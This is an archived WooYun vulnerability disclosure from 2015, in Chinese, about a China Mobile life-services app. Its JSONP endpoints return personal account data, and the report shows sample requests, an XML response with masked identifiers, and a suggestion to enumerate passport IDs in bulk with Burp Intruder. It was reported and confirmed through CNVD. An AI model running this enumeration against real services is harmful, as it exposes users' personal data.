乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-10: 细节已通知厂商并且等待厂商处理中 2015-10-14: 厂商已经确认,细节仅向厂商公开 2015-10-24: 细节向核心白帽子及相关领域专家公开 2015-11-03: 细节向普通白帽子公开 2015-11-13: 细节向实习白帽子公开 2015-11-28: 细节向公众公开
用户信息泄漏,可批量
手机代理通过brup上网,登陆"和生活"-通讯账单
**.**.**.**/3g/3/life/CommunicationBill/index.jsonp?callback=jQuery110208061564099043608_1444407841376&msisdn=1350766****&_=1444407841377
话费使用情况
**.**.**.**/3g/3/life/CommunicationBill/getBusiness.jsonp?callback=jQuery110208061564099043608_1444407841376&msisdn=1350766****&_=1444407841378
订购信息点个人资料
HTTP/1.1 200 OKDate: Fri, 09 Oct 2015 16:20:12 GMTmsgversion: 1.0.0transactionid: 20040sendareacode: 000001sendaddress: 99030000recvareacode: 000002recvaddress: 00010Content-Type: text/html;charset=UTF-8Server: Jetty(7.6.3.v20120416)Content-Length: 1402<?xml version="1.0" encoding="UTF-8" standalone="yes"?><root> <msgname>getuserinforesp</msgname> <transactionid>20040</transactionid> <timestamp>20151010003022</timestamp> <result>001000</result> <resultdesc>success</resultdesc> <body> <userinfo> <passportid>A201301120019908****</passportid> <mobnum>1350766****</mobnum> <mail>*****@**.**.**.**</mail> <username></username> <userclass>0</userclass> <eccode></eccode> <areacode>411700</areacode> <name></name> <sex>0</sex> <birthday></birthday> <address></address> <postcode></postcode> <userlogolist/> <interests></interests> <profession></profession> <idcard></idcard> <married>0</married> <havechildren>0</havechildren> <salary></salary> <school></school> <nationality></nationality> <folk></folk> <polity></polity> <faith></faith> <emailstatus>0</emailstatus> <phonestatus>0</phonestatus> <userstatus>0</userstatus> <extensioninfos/> <agreementstatus>1</agreementstatus> <memberorderstatus>0</memberorderstatus> </userinfo> </body></root>
提交到brup的intruder
<passportid>A201301120019908$****$</passportid> 关键就是这个字典自己生成,然后开始跑吧
自己想办法
危害等级:中
漏洞Rank:9
确认时间:2015-10-14 17:13
CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置。
暂无